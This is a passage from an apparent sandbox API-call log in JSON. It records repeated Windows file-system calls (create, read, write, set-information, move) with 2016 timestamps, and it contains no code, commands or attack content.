"2016-02-16 17:41:56,363", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,373", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,383", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,393", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,403", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,413", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,413", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,423", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,433", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,453", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,463", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,473", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,473", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,483", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,493", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,493", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,503", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,513", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,523", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,533", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,533", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,543", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,543", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,543", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,553", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,553", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,563", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,563", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,573", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,573", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,573", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,573", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,584", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,584", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,594", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,594", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,594", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,604", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,604", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,614", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,614", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,624", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,624", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,634", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,634", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,634", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,644", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,644", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,654", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,654", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,654", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,664", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": 